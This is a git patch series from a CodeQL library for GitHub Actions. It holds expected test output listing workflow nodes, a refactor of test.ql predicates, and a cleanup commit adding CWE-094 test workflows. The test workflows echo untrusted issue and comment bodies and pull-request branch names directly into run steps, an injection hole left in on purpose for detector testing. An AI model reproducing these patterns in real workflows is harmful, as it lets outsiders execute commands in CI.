github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | | .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | @@ -312,26 +210,20 @@ cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | @@ -346,14 +238,11 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | @@ -385,36 +274,6 @@ dfNodes | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -exprNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index bf52da395fef..8cf97d58ab03 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,3 @@ -import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow @@ -7,28 +6,32 @@ import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } -query predicate yamlNodes(YamlNode n) { any() } +query predicate workflows(Workflow w) { any() } -query predicate jobNodes(Job s) { any() } +query predicate reusableWorkflows(ReusableWorkflow w) { any() } -query predicate stepNodes(Step s) { any() } +query predicate compositeActions(CompositeAction w) { any() } -query predicate runNodes(Run s) { any() } +query predicate jobs(Job s) { any() } -query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } +query predicate localJobs(LocalJob s) { any() } -query predicate allUsesNodes(Uses s) { any() } +query predicate extJobs(ExternalJob s) { any() } -query predicate stepUsesNodes(UsesStep s) { any() } +query predicate steps(Step s) { any() } -query predicate jobUsesNodes(UsesStep s) { any() } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate usesSteps(Uses call, string argname, AstNode arg) { +query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } + +query predicate uses(Uses s) { any() } + +query predicate stepUses(UsesStep s) { any() } + +query predicate usesArgs(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } - query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } @@ -37,8 +40,6 @@ query predicate cfgNodes(Cfg::Node n) { any() } query predicate dfNodes(DataFlow::Node e) { any() } -query predicate exprNodes(DataFlow::Node e) { any() } - query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } query predicate usesIds(UsesStep s, string a) { s.getId() = a } From 0b71d0240743a84888b6bb3fffa47feb51f8d2ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 13:49:50 +0100 Subject: [PATCH 090/707] fix: clean debug lefovers --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 34 ------ .../codeql/actions/dataflow/FlowSources.qll | 1 + .../dataflow/internal/DataFlowPrivate.qll | 2 - .../CWE-094/CriticalExpressionInjection.ql | 12 +-- .../CWE-094/.github/workflows/changelog.yml | 100 ++++++++++++++++++ .../.github/workflows/changelog_required.yml | 9 ++ 7 files changed, 116 insertions(+), 43 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bfedd623f5c..3123518d3690 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -121,7 +121,6 @@ class Outputs extends AstNode instanceof OutputsImpl { Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - // TODO: REMOVE override string toString() { result = "Job outputs node" } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 63b25229a588..028f22806807 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -252,11 +252,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getInputs() or - // result = this.getOutputs() or - // result = this.getRuns() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "CompositeActionImpl" } @@ -292,12 +287,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getAJob() or - // result = this.getStrategy() or - // result = this.getEnv() or - // result = this.getPermissions() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "WorkflowImpl" } @@ -306,8 +295,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } - // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -346,11 +333,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = super.getAChildNode() or - // result = this.getInputs() or - // result = this.getOutputs() - // } OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } @@ -378,7 +360,6 